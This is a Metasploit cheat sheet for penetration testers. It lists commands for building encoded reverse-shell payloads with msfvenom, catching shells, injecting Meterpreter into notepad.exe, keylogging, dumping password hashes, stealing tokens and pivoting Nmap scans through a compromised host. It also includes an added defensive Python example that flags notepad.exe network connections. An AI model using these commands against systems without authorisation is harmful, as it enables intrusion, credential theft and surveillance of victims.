METASPLOIT

METASPLOIT OPTIONS

  • More info at: https://cdn.comparitech.com/wp-content/uploads/2019/06/Metasploit-Cheat-Sheet-1.webp

  • msfconsole -r <FILE_PATH>.rc | Launch Metasploit and load resource file

  • show exploits | Display exploits

  • show auxiliary | Display auxiliary modules

  • show payloads | Display payloads

  • search <SEARCH_STRING> | Searches module names and descriptions

  • info <MODULE> | Show module information

  • use <MODULE> | Load exploit or module

  • show options | Display module options

  • show advanced | Display advanced module options

  • set <OPTION> <VALUE> | Configure framework options/parameters

  • sessions -v | List Metasploit sessions

  • sessions -k <ID> | Kill Metasploit session ID

  • sessions -s <SCRIPT> | Run Meterpreter script on all sessions

  • jobs -l | List all jobs

  • jobs -k <ID> | Kill given job ID

  • exploit -j | Run exploit as background job

  • route add <IP_ADDRESS> <NETMASK> <SESSION_ID> | Pivoting

  • loadpath <FILE_PATH> | Load 3rd party modules or exploits

  • irb | Live Ruby interpreter shell

  • connect -s <IP_ADDRESS> <PORT> | SSL connect (Acts similarly to Netcat)

  • use exploit/multi/handler | Generic payload handler; with ExitOnSession set to false it keeps listening and can catch multiple shells

  • set ExitOnSession false | Advanced handler option: keep the listener running after a session is caught (allows multiple shells)

  • set ConsoleLogging true | Log all console input and output

  • set SessionLogging true | Log all session activity

CREATE & CATCH PAYLOADS (MSFVENOM)

List available encoders

msfvenom --list encoders

List available payloads

msfvenom --list payloads

Create an encoded Meterpreter reverse TCP payload for Windows systems

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP_ADDRESS> LPORT=<PORT> -e x86/shikata_ga_nai -i 3 -a x86 -f exe > encoded.exe

Create a Meterpreter reverse TCP payload for Linux systems

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP_ADDRESS> LPORT=<PORT> -f elf > reverse.elf

Start Meterpreter listener (LHOST and LPORT must match the values baked into the msfvenom payload; then run exploit -j to catch shells in the background)

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <IP_ADDRESS>
set LPORT <PORT>

START MSF DB (KALI)

Start the PostgreSQL database, then msfconsole (on Kali, run msfdb init once if the database has never been initialised)

service postgresql start
msfconsole

METERPRETER PASS A SHELL

  • Note: By default, this module creates a new notepad.exe process and injects the Meterpreter payload into it.
# Use module
use post/windows/manage/multi_meterpreter_inject

# Set target IP address to pass the shell to
set IPLIST <IP_ADDRESS>

# Set the target port
set LPORT <PORT>

# Set the session ID to run this module against
set SESSION <SESSION_ID>

# Run the module
exploit
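A defender-side check for the injection pattern noted above: the module parks the new shell in a freshly spawned notepad.exe, so an outbound network connection initiated by notepad.exe is a strong signal. This is an added example, not part of the original cheat sheet or of the Metasploit project; the event shape, the no-network image list and the sample records are constructed assumptions modelled loosely on Sysmon Event ID 3 (NetworkConnect).

```python
"""Flag network connections from processes that should never talk to the
network, such as the notepad.exe host used by multi_meterpreter_inject.
Event shape and sample records are constructed for this example."""
from dataclasses import dataclass
from typing import Iterable, List

# Images that should not initiate outbound connections on a workstation.
# Assumed baseline for this example; tune it to the environment.
NO_NETWORK_IMAGES = {"notepad.exe", "calc.exe", "mspaint.exe", "wordpad.exe"}


@dataclass(frozen=True)
class NetConnEvent:
    """Minimal view of a Sysmon Event ID 3 style record (constructed)."""
    image: str        # full path of the process image
    pid: int
    initiated: bool   # True when this process opened the connection
    dest_ip: str
    dest_port: int


def suspicious_connections(events: Iterable[NetConnEvent]) -> List[NetConnEvent]:
    """Return connections initiated by an image on the no-network list."""
    hits = []
    for ev in events:
        name = ev.image.rsplit("\\", 1)[-1].lower()   # basename of the image path
        if ev.initiated and name in NO_NETWORK_IMAGES:
            hits.append(ev)
    return hits


# Constructed sample telemetry: a browser connecting out (benign), a
# notepad.exe process calling back to a handler (the injection pattern),
# and an inbound SMB connection accepted by svchost.exe (not initiated).
SAMPLE_EVENTS = [
    NetConnEvent(r"C:\Program Files\Mozilla Firefox\firefox.exe", 4120, True, "203.0.113.10", 443),
    NetConnEvent(r"C:\Windows\System32\notepad.exe", 5288, True, "10.0.0.5", 4444),
    NetConnEvent(r"C:\Windows\System32\svchost.exe", 912, False, "10.0.0.20", 445),
]

if __name__ == "__main__":
    for hit in suspicious_connections(SAMPLE_EVENTS):
        print(f"ALERT pid={hit.pid} {hit.image} -> {hit.dest_ip}:{hit.dest_port}")
```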

METERPRETER COMMANDS

  • help | List available commands
  • sysinfo | Display system info
  • ps | List processes
  • getpid | Show the PID of the current process
  • upload <LOCAL_PATH> "C:\\Program Files\\test.exe" | Upload a file to C:\Program Files\test.exe (quote paths containing spaces; backslashes are doubled)
  • download <FILE_PATH> | Download file
  • reg <COMMAND> | Interact with registry (reg by itself will list syntax)
  • rev2self | Revert to original user
  • shell | Drop to interactive shell
  • migrate <PID> | Migrate to another PID
  • background | Background current session and return to msfconsole
  • keyscan_start | Start keylogger
  • keyscan_stop | Stop keylogger
  • keyscan_dump | Dump keylogger
  • execute -f cmd.exe -i | Execute cmd.exe and interact
  • execute -f cmd.exe -i -H -t | Execute cmd.exe as hidden process and with all tokens
  • hashdump | Dumps local hashes
  • run <SCRIPT> | Executes script (/scripts/meterpreter)
  • portfwd add -L 127.0.0.1 -l 443 -r 3.3.3.3 -p 3389 | Create a rule to open port 443 on the attack machine and forward it through the session to target 3.3.3.3 on port 3389
  • portfwd delete -L 127.0.0.1 -l 443 -r 3.3.3.3 -p 3389 | Delete the rule to open port 443 on the attack machine and forward it through the session to target 3.3.3.3 on port 3389
  • getuid | List current session owner
  • steal_token <PID> | Steal authentication token from process
  • screengrab | Run plugin to capture screenshot of user session

NMAP THROUGH METERPRETER SOCKS PROXY

# Take note of the Meterpreter ID
sessions

# Add a route through the target host
route add 3.3.3.0 255.255.255.0 <SESSION_ID>

# Set up the socks4a server
use auxiliary/server/socks4a

# Run the socks4a server (defaults to port 1080)
run

# Add this line to the [ProxyList] section of /etc/proxychains.conf so proxychains uses port 1080
socks4 127.0.0.1 1080

# Run Nmap scan against 3.3.3.3 targeting ports 80, 135, and 445.
# This scan is tunneled through the Metasploit victim host. A SOCKS proxy only carries
# full TCP connections, so use -sT (connect scan), -Pn (no ping host discovery) and -n (no DNS).
proxychains nmap -sT -Pn -n -p 80,135,445 3.3.3.3